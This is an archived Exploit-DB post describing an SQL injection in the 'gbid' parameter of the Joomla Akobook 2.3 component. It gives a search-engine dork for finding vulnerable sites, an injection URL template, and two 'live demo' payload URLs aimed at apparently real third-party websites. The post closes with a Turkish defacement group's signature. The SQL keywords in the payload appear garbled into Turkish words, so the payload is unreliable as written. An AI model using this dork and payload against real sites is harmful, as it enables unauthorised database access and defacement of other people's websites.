Joomla Component Akobook 2.3 gbid SQL Injection Vulnerability

2009-06-09T00:00:00
ID EDB-ID:8911
Type exploitdb
Reporter Ab1i
Modified 2009-06-09T00:00:00

Description

Joomla Component Akobook 2.3 (gbid) SQL Injection Vulnerability. CVE-2009-2638. Webapps exploit for php platform

                                        
                                            Joomla Component com_akobook Vulnerability
----------------------------------------------------------------------
 ###################################################
 [+] Author        :  Ab1i
 [+] Email         :  ab1i_usta@hotmail.com
 [+] Dork  : inurl:index.php?option=com_akobook
 ###################################################
________________________________________________________
Example:
http://localHost/path/components/index.php?option=com_akobook&Itemid=36= ( SQL code )

Demo Live (1):
http://lesnyak.ru/index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birliği%20+%20+1,2,3,4,5,6,7,8,9%20seçin%20,%2010,11,12,13,14,15,%2016,17,18,19%20/%20*
Demo Live (2):
http://www.prostatitunet.ru/index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birliği%20+%20+1,2,3,4,5,6,7,8,9%20seçin%20,%2010,11,12,13,14,15,%2016,17,18,19%20/%20*
++++++++++++++++++++++++++++++++++++++++++++++++++
www.ayyildiz.org
Türk 'ün Türkten başka dostu yoktur . Sizde Türk siteleri Destek olun ....
Turkish Defacers Ab1i
Eno7 , The_Bekir , Bgh7 , m0sted , Beygazi . Ustalara Selam olsun :)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

<name>AkoBook</name>
<creationDate>09.04.2006</creationDate>
<author>Melikyan Sergey aka SaD</author>
<copyright> This component is released under the GNU/GPL License.  </copyright>
<authorEmail>contact@saddo.ru</authorEmail>
<authorUrl>http://saddo.ru/</authorUrl>
<version>SE 2.3</version>

# milw0rm.com [2009-06-09]